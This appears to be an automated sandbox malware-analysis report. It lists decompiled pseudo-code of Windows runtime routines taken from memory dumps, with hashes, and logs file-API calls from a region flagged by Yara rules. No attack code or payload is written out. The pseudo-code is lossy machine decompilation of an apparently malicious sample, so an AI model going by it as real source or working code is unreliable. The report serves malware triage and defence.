                                          			E00F3746D(short* __ebx, void* __ecx, void* __edi, intOrPtr __esi) {
                                          				signed int _t8;
                                          				void* _t10;
                                          				short* _t17;
                                          				void* _t19;
                                          				intOrPtr _t20;
                                          				void* _t21;
                                          
                                          				_t20 = __esi;
                                          				_t19 = __edi;
                                          				_t17 = __ebx;
                                          				if( *((char*)(_t21 - 0x25)) != 0) {
                                          					if(__ecx == 0) {
                                          						E00F2EB70(__ecx, 0x10079a0);
                                          					} else {
                                          						asm("lock xadd [ecx], eax");
                                          						if((_t8 | 0xffffffff) == 0) {
                                          							_push( *((intOrPtr*)(__ecx + 4)));
                                          							E00F595D0();
                                          							L00F377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t21 - 0x50)));
                                          							_t17 =  *((intOrPtr*)(_t21 - 0x2c));
                                          							_t20 =  *((intOrPtr*)(_t21 - 0x3c));
                                          						}
                                          					}
                                          					L10:
                                          				}
                                          				_t10 = _t19 + _t19;
                                          				if(_t20 >= _t10) {
                                          					if(_t19 != 0) {
                                          						 *_t17 = 0;
                                          						return 0;
                                          					}
                                          				}
                                          				return _t10;
                                          				goto L10;
                                          			}










                                          Memory Dump Source
                                          • Source File: 00000005.00000002.306740948.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 36%
                                          			E00FE8B58(intOrPtr __ecx) {
                                          				signed int _v8;
                                          				intOrPtr _v20;
                                          				short _v46;
                                          				char _v52;
                                          				signed char* _t11;
                                          				intOrPtr _t17;
                                          				intOrPtr _t22;
                                          				intOrPtr _t23;
                                          				intOrPtr _t24;
                                          				signed int _t25;
                                          
                                          				_v8 =  *0x100d360 ^ _t25;
                                          				_v20 = __ecx;
                                          				_v46 = 0x1c26;
                                          				if(E00F37D50() == 0) {
                                          					_t11 = 0x7ffe0386;
                                          				} else {
                                          					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                          				}
                                          				_push( &_v52);
                                          				_push(4);
                                          				_push(0x402);
                                          				_push( *_t11 & 0x000000ff);
                                          				return E00F5B640(E00F59AE0(), _t17, _v8 ^ _t25, _t22, _t23, _t24);
                                          			}














                                          Memory Dump Source
                                          • Source File: 00000005.00000002.306740948.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E00F14F2E(void* __ecx, char _a4) {
                                          				void* __esi;
                                          				void* __ebp;
                                          				void* _t17;
                                          				void* _t19;
                                          				void* _t20;
                                          				void* _t21;
                                          
                                          				_t18 = __ecx;
                                          				_t21 = __ecx;
                                          				if(__ecx == 0) {
                                          					L6:
                                          					__eflags = _a4;
                                          					if(__eflags != 0) {
                                          						L8:
                                          						E00FE88F5(_t17, _t18, _t19, _t20, _t21, __eflags);
                                          						L9:
                                          						return 0;
                                          					}
                                          					__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
                                          					if(__eflags != 0) {
                                          						goto L9;
                                          					}
                                          					goto L8;
                                          				}
                                          				_t18 = __ecx + 0x30;
                                          				if(E00F3C5D5(__ecx + 0x30, _t19) == 0 ||  *((intOrPtr*)(__ecx + 0x34)) != 0xef1030 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
                                          					goto L6;
                                          				} else {
                                          					return 1;
                                          				}
                                          			}










                                          Memory Dump Source
                                          • Source File: 00000005.00000002.306740948.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E00F4A44B(signed int __ecx) {
                                          				intOrPtr _t13;
                                          				signed int _t15;
                                          				signed int* _t16;
                                          				signed int* _t17;
                                          
                                          				_t13 =  *0x1007b9c; // 0x0
                                          				_t15 = __ecx;
                                          				_t16 = L00F34620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t13 + 0xc0000, 8 + __ecx * 4);
                                          				if(_t16 == 0) {
                                          					return 0;
                                          				}
                                          				 *_t16 = _t15;
                                          				_t17 =  &(_t16[2]);
                                          				E00F5FA60(_t17, 0, _t15 << 2);
                                          				return _t17;
                                          			}








                                          Memory Dump Source
                                          • Source File: 00000005.00000002.306740948.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 79%
                                          			E00F1F358(void* __ecx, signed int __edx) {
                                          				char _v8;
                                          				signed int _t9;
                                          				void* _t20;
                                          
                                          				_push(__ecx);
                                          				_t9 = 2;
                                          				_t20 = 0;
                                          				if(E00F4F3D5( &_v8, _t9 * __edx, _t9 * __edx >> 0x20) >= 0 && _v8 != 0) {
                                          					_t20 = L00F34620( &_v8,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
                                          				}
                                          				return _t20;
                                          			}







                                          Memory Dump Source
                                          • Source File: 00000005.00000002.306740948.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E00F2FF60(intOrPtr _a4) {
                                          				void* __ecx;
                                          				void* __ebp;
                                          				void* _t13;
                                          				intOrPtr _t14;
                                          				void* _t15;
                                          				void* _t16;
                                          				void* _t17;
                                          
                                          				_t14 = _a4;
                                          				if(_t14 == 0 || ( *(_t14 + 0x68) & 0x00030000) != 0 ||  *((intOrPtr*)(_t14 + 4)) != 0xef11a4 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
                                          					return E00FE88F5(_t13, _t14, _t15, _t16, _t17, __eflags);
                                          				} else {
                                          					return E00F30050(_t14);
                                          				}
                                          			}











                                          Memory Dump Source
                                          • Source File: 00000005.00000002.306740948.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 82%
                                          			E00FA41E8(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                          				void* _t5;
                                          				void* _t14;
                                          
                                          				_push(8);
                                          				_push(0xff08f0);
                                          				_t5 = E00F6D08C(__ebx, __edi, __esi);
                                          				if( *0x10087ec == 0) {
                                          					E00F2EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                                          					 *(_t14 - 4) =  *(_t14 - 4) & 0x00000000;
                                          					if( *0x10087ec == 0) {
                                          						 *0x10087f0 = 0x10087ec;
                                          						 *0x10087ec = 0x10087ec;
                                          						 *0x10087e8 = 0x10087e4;
                                          						 *0x10087e4 = 0x10087e4;
                                          					}
                                          					 *(_t14 - 4) = 0xfffffffe;
                                          					_t5 = L00FA4248();
                                          				}
                                          				return E00F6D0D1(_t5);
                                          			}






                                          Memory Dump Source
                                          • Source File: 00000005.00000002.306740948.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E00FCD380(void* __ecx, void* __edx, intOrPtr _a4) {
                                          				void* _t5;
                                          
                                          				if(_a4 != 0) {
                                          					_t5 = L00F1E8B0(__ecx, _a4, 0xfff);
                                          					L00F377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
                                          					return _t5;
                                          				}
                                          				return 0xc000000d;
                                          			}





                                          Memory Dump Source
                                          • Source File: 00000005.00000002.306740948.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E00F4A185() {
                                          				void* __ecx;
                                          				intOrPtr* _t5;
                                          
                                          				if( *0x10067e4 >= 0xa) {
                                          					if(_t5 < 0x1006800 || _t5 >= 0x1006900) {
                                          						return L00F377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t5);
                                          					} else {
                                          						goto L1;
                                          					}
                                          				} else {
                                          					L1:
                                          					return E00F30010(0x10067e0, _t5);
                                          				}
                                          			}






                                          Memory Dump Source
                                          • Source File: 00000005.00000002.306740948.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 8eda93a67f0d8ade13ef18b06cbfe8c4649b138ff9e929c916112f731851dfee
                                          • Instruction ID: 4edf1f3b5c2cea074fe86143514437dbb1fb24e65caa0b0e6b07fea80d44abaf
                                          • Opcode Fuzzy Hash: 8eda93a67f0d8ade13ef18b06cbfe8c4649b138ff9e929c916112f731851dfee
                                          • Instruction Fuzzy Hash: 54D05EB11A10405AFA2E6710DD65B253657F7C8720F30484EF18B4A9E5EEAA88F4F60A
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E00F416E0(void* __edx, void* __eflags) {
                                          				void* __ecx;
                                          				void* _t3;
                                          
                                          				_t3 = E00F41710(0x10067e0);
                                          				if(_t3 == 0) {
                                          					_t6 =  *[fs:0x30];
                                          					if( *((intOrPtr*)( *[fs:0x30] + 0x18)) == 0) {
                                          						goto L1;
                                          					} else {
                                          						return L00F34620(_t6,  *((intOrPtr*)(_t6 + 0x18)), 0, 0x20);
                                          					}
                                          				} else {
                                          					L1:
                                          					return _t3;
                                          				}
                                          			}






                                          Memory Dump Source
                                          • Source File: 00000005.00000002.306740948.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 0888c472b0cc87f7eff01f9acad39bc1016ce3f98ded5c0c84f98d800dda3ca4
                                          • Instruction ID: 105cbf4edbabb1a92847f5c418afdd351c190ebcb33006643d18bd95e56acb45
                                          • Opcode Fuzzy Hash: 0888c472b0cc87f7eff01f9acad39bc1016ce3f98ded5c0c84f98d800dda3ca4
                                          • Instruction Fuzzy Hash: 96D0A73110010052EA2D5B149C05B143652FB807A1F38005CF50B494C1DFA5DCE2F448
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E00F953CA(void* __ebx) {
                                          				intOrPtr _t7;
                                          				void* _t13;
                                          				void* _t14;
                                          				intOrPtr _t15;
                                          				void* _t16;
                                          
                                          				_t13 = __ebx;
                                          				if( *((char*)(_t16 - 0x65)) != 0) {
                                          					E00F2EB70(_t14,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                                          					_t7 =  *((intOrPtr*)(_t16 - 0x64));
                                          					_t15 =  *((intOrPtr*)(_t16 - 0x6c));
                                          				}
                                          				if(_t15 != 0) {
                                          					L00F377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t13, _t15);
                                          					return  *((intOrPtr*)(_t16 - 0x64));
                                          				}
                                          				return _t7;
                                          			}









                                          Memory Dump Source
                                          • Source File: 00000005.00000002.306740948.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 67b7ac285cf5eeec7b30a6c71a9a804199707b28aa5e3d1143cb4169285b8378
                                          • Instruction ID: 056d89928ea689d0e50f7deab2724dfe405376eb599d0b1096ca7e52f6ac0ee3
                                          • Opcode Fuzzy Hash: 67b7ac285cf5eeec7b30a6c71a9a804199707b28aa5e3d1143cb4169285b8378
                                          • Instruction Fuzzy Hash: ADE0EC72944B849BDF13EB59CA50F5EB7F6FB84B50F150454B4085B661C668ED00DB40
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000005.00000002.305959053.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: cd5965ff1bff87cc1096ef512adcd51672d866ddefb65cd8dd67137310bfc7f5
                                          • Instruction ID: 760c2aa2da851f852a9bec609889ba5f06550f522b223204090a29af678f7db9
                                          • Opcode Fuzzy Hash: cd5965ff1bff87cc1096ef512adcd51672d866ddefb65cd8dd67137310bfc7f5
                                          • Instruction Fuzzy Hash: 28C09B16F874158515149D9D34410B4F379E9E7465F547277CD1CF31041907C41184DF
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E00F435A1(void* __eax, void* __ebx, void* __ecx) {
                                          				void* _t6;
                                          				void* _t10;
                                          				void* _t11;
                                          
                                          				_t10 = __ecx;
                                          				_t6 = __eax;
                                          				if( *((intOrPtr*)(_t11 - 0x34)) >= 0 && __ebx != 0) {
                                          					 *((intOrPtr*)(__ecx + 0x294)) =  *((intOrPtr*)(__ecx + 0x294)) + 1;
                                          				}
                                          				if( *((char*)(_t11 - 0x1a)) != 0) {
                                          					return E00F2EB70(_t10,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                                          				}
                                          				return _t6;
                                          			}







                                          Memory Dump Source
                                          • Source File: 00000005.00000002.306740948.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
                                          • Instruction ID: 38addcd6fa4b2bc3a851825ee0f82e286737b80f9f8b2d4877da7b65acc3cc9f
                                          • Opcode Fuzzy Hash: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
                                          • Instruction Fuzzy Hash: A0D0C9329511869ADB51BB50D6187687BB2BB00328F6C2065984646966C33A4F5AF603
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E00F2AAB0() {
                                          				intOrPtr* _t4;
                                          
                                          				_t4 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
                                          				if(_t4 != 0) {
                                          					if( *_t4 == 0) {
                                          						goto L1;
                                          					} else {
                                          						return  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x1e;
                                          					}
                                          				} else {
                                          					L1:
                                          					return 0x7ffe0030;
                                          				}
                                          			}





                                          Memory Dump Source
                                          • Source File: 00000005.00000002.306740948.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
                                          • Instruction ID: 99ed80194b4d551462ddcfc06d07b5b09d99458d83a51fa5ce2158b3d899a77c
                                          • Opcode Fuzzy Hash: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
                                          • Instruction Fuzzy Hash: 49D0C935352D80CFD616CF0CC554B0533A4BB44B40FC50490E400CB721E62CDD44CA01
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E00F9A537(intOrPtr _a4, intOrPtr _a8) {
                                          
                                          				return L00F38E10( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a8, _a4);
                                          			}




                                          Memory Dump Source
                                          • Source File: 00000005.00000002.306740948.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
                                          • Instruction ID: 5a7ca73eed916b1bba507c3416257b28bed090dd024f5da93511f2f2b7ad6fea
                                          • Opcode Fuzzy Hash: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
                                          • Instruction Fuzzy Hash: 30C01232040248BBCB126E81CC01F057F2AE754760F004010B5040A5618536D971E644
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E00F1DB40() {
                                          				signed int* _t3;
                                          				void* _t5;
                                          
                                          				_t3 = L00F34620(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x64);
                                          				if(_t3 == 0) {
                                          					return 0;
                                          				} else {
                                          					 *_t3 =  *_t3 | 0x00000400;
                                          					return _t3;
                                          				}
                                          			}






                                          Memory Dump Source
                                          • Source File: 00000005.00000002.306740948.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
                                          • Instruction ID: 2d2ecba93288bb3902f32599400fb1a77ddaf2e0aaf11c71a0eddf2962ecc654
                                          • Opcode Fuzzy Hash: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
                                          • Instruction Fuzzy Hash: 27C08C30280A00AAEB225F20CD02B4076A0BB41B01F4500A07301DA0F1DB7CEC02FA00
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E00F1AD30(intOrPtr _a4) {
                                          
                                          				return L00F377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
                                          			}




                                          Memory Dump Source
                                          • Source File: 00000005.00000002.306740948.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
                                          • Instruction ID: a7012d2ef81c2d306a717d4f0ce74a52428d264d8d773309d613b0d1e3430d75
                                          • Opcode Fuzzy Hash: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
                                          • Instruction Fuzzy Hash: FDC08C32080288BBC7226A45CD01F017B29E790B60F000020B6040A6628936E860E588
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E00F276E2(void* __ecx) {
                                          				void* _t5;
                                          
                                          				if(__ecx != 0 && ( *(__ecx + 0x20) & 0x00000040) == 0) {
                                          					return L00F377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, __ecx);
                                          				}
                                          				return _t5;
                                          			}





                                          Memory Dump Source
                                          • Source File: 00000005.00000002.306740948.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
                                          • Instruction ID: 7ed78a44c8b4547cdcf01c1089a4eedb2fd43bc776bfa81293987f24dc835fab
                                          • Opcode Fuzzy Hash: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
                                          • Instruction Fuzzy Hash: A7C08CB0549BC85AEB2A7709CE21B203A50EB08728F48019CBA02094A2C36CAC02E208
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E00F436CC(void* __ecx) {
                                          
                                          				if(__ecx > 0x7fffffff) {
                                          					return 0;
                                          				} else {
                                          					return L00F34620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, __ecx);
                                          				}
                                          			}




                                          Memory Dump Source
                                          • Source File: 00000005.00000002.306740948.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
                                          • Instruction ID: f1d72f9b47bb936ff54b0daf3c53a9cd00c150d01e5b0489829f98d09919c590
                                          • Opcode Fuzzy Hash: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
                                          • Instruction Fuzzy Hash: 1FC02B70150840BBE7152F30CD03F14B254F700B31F6403547220454F0D52CBC00F100
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E00F33A1C(intOrPtr _a4) {
                                          				void* _t5;
                                          
                                          				return L00F34620(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
                                          			}





                                          Memory Dump Source
                                          • Source File: 00000005.00000002.306740948.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
                                          • Instruction ID: 667e6541bb9d97bd27061b44f2848cc4133eb55d97de7d7aa9be53a7fe44e51d
                                          • Opcode Fuzzy Hash: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
                                          • Instruction Fuzzy Hash: EDC04C32180648BBC7126E45DD02F15BB69E795B60F154021B6040A5618576FD61E598
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E00F37D50() {
                                          				intOrPtr* _t3;
                                          
                                          				_t3 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
                                          				if(_t3 != 0) {
                                          					return  *_t3;
                                          				} else {
                                          					return _t3;
                                          				}
                                          			}





                                          Memory Dump Source
                                          • Source File: 00000005.00000002.306740948.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
                                          • Instruction ID: 99633da719d18cc4959a3d6c495a673c892be89fffeaf9733382d1febd210bf7
                                          • Opcode Fuzzy Hash: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
                                          • Instruction Fuzzy Hash: F5B09234301A408FCE26EF18C080B1533E4BB44B60F8400D0E800CBA20D329E8009900
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E00F42ACB() {
                                          				void* _t5;
                                          
                                          				return E00F2EB70(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                                          			}





                                          Memory Dump Source
                                          • Source File: 00000005.00000002.306740948.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
                                          • Instruction ID: 52eaa5a51ed99d266170a3dabd7f77a011bc5a8c94b10a6a56c6bf34f3435316
                                          • Opcode Fuzzy Hash: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
                                          • Instruction Fuzzy Hash: 97B01233C10450CFCF02EF40DA10B197331FB40750F154490A00127931C22CAC11DB40
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 53%
                                          			E00FAFDDA(intOrPtr* __edx, intOrPtr _a4) {
                                          				void* _t7;
                                          				intOrPtr _t9;
                                          				intOrPtr _t10;
                                          				intOrPtr* _t12;
                                          				intOrPtr* _t13;
                                          				intOrPtr _t14;
                                          				intOrPtr* _t15;
                                          
                                          				_t13 = __edx;
                                          				_push(_a4);
                                          				_t14 =  *[fs:0x18];
                                          				_t15 = _t12;
                                          				_t7 = E00F5CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
                                          				_push(_t13);
                                          				E00FA5720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
                                          				_t9 =  *_t15;
                                          				if(_t9 == 0xffffffff) {
                                          					_t10 = 0;
                                          				} else {
                                          					_t10 =  *((intOrPtr*)(_t9 + 0x14));
                                          				}
                                          				_push(_t10);
                                          				_push(_t15);
                                          				_push( *((intOrPtr*)(_t15 + 0xc)));
                                          				_push( *((intOrPtr*)(_t14 + 0x24)));
                                          				return E00FA5720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
                                          			}











                                          APIs
                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00FAFDFA
                                          Strings
                                          • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 00FAFE2B
                                          • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 00FAFE01
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.306740948.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true
                                          Similarity
                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                          • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                          • API String ID: 885266447-3903918235
                                          • Opcode ID: ce7f2d178728b157a308f42a31498d4815cf2aff6b671630def45e6b4210cff7
                                          • Instruction ID: 18ebd43937fdbafa38dca53c76c29bd319c1f2a3bd9066053c6d97313bea89f0
                                          • Opcode Fuzzy Hash: ce7f2d178728b157a308f42a31498d4815cf2aff6b671630def45e6b4210cff7
                                          • Instruction Fuzzy Hash: 5DF0FC725006017FD6201A45DC46F37BF5ADB45730F244315F618551E1EA62F820B6F5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Executed Functions

                                          APIs
                                          • NtCreateFile.NTDLL(00000060,00000000,.z`,00F74B87,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00F74B87,007A002E,00000000,00000060,00000000,00000000), ref: 00F79DAD
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000F.00000002.501334938.0000000000F60000.00000040.00000001.sdmp, Offset: 00F60000, based on PE: false
                                          Yara matches
                                          Similarity
                                          • API ID: CreateFile
                                          • String ID: .z`
                                          • API String ID: 823142352-1441809116
                                          • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                          • Instruction ID: b9504bc1226a9fc782565508341bd4f1c1acc302dc856902b52175d14b2939b0
                                          • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                          • Instruction Fuzzy Hash: 84F0B2B2200208ABCB48CF88DC85EEB77ADAF8C754F158248BA0D97241C630E8118BA4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • NtCreateFile.NTDLL(00000060,00000000,.z`,00F74B87,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00F74B87,007A002E,00000000,00000060,00000000,00000000), ref: 00F79DAD
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000F.00000002.501334938.0000000000F60000.00000040.00000001.sdmp, Offset: 00F60000, based on PE: false
                                          Yara matches
                                          Similarity
                                          • API ID: CreateFile
                                          • String ID: .z`
                                          • API String ID: 823142352-1441809116
                                          • Opcode ID: 8526263a9d86fe8db03230301bbabf022aae20fe410316903bfa2187470fd3dc
                                          • Instruction ID: 2e4458d3bdac150be83c901a257425bbe47eb813ab626cd41947f19742292b5c
                                          • Opcode Fuzzy Hash: 8526263a9d86fe8db03230301bbabf022aae20fe410316903bfa2187470fd3dc
                                          • Instruction Fuzzy Hash: ACF0B6B2210108AFDB48CF88DC95DEB77BDAF8C744F15825DBA0D97251C630E811CBA4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • NtReadFile.NTDLL(00F74D42,5EB6522D,FFFFFFFF,00F74A01,?,?,00F74D42,?,00F74A01,FFFFFFFF,5EB6522D,00F74D42,?,00000000), ref: 00F79E55
                                          Memory Dump Source
                                          • Source File: 0000000F.00000002.501334938.0000000000F60000.00000040.00000001.sdmp, Offset: 00F60000, based on PE: false
                                          Yara matches
                                          Similarity
                                          • API ID: FileRead
                                          • String ID:
                                          • API String ID: 2738559852-0
                                          • Opcode ID: 0904214d0094a6a731e947f72d220e33c7149a6e8a60413121bc8f7f69fe2d4a
                                          • Instruction ID: bd042ae9a54b72f182e5cb207e0b1c4087dfcff9302b8dbb1103856e9ded07f2
                                          • Opcode Fuzzy Hash: 0904214d0094a6a731e947f72d220e33c7149a6e8a60413121bc8f7f69fe2d4a
                                          • Instruction Fuzzy Hash: DFF0F4B2200108AFCB14CF99DC80EEB77ADEF8C354F168648FA0DA7241D630E811CBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • NtReadFile.NTDLL(00F74D42,5EB6522D,FFFFFFFF,00F74A01,?,?,00F74D42,?,00F74A01,FFFFFFFF,5EB6522D,00F74D42,?,00000000), ref: 00F79E55
                                          Memory Dump Source
                                          • Source File: 0000000F.00000002.501334938.0000000000F60000.00000040.00000001.sdmp, Offset: 00F60000, based on PE: false
                                          Yara matches
                                          Similarity
                                          • API ID: FileRead
                                          • String ID:
                                          • API String ID: 2738559852-0
                                          • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                          • Instruction ID: d0f36bfc8fda827878e82e0b099d43c79dba14eaed257ed77803fc8fdaa15bca
                                          • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                          • Instruction Fuzzy Hash: 71F0BDB2200108AFCB14DF89DC81DEB77ADEF8C754F158249BE1D97241D630E811CBA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
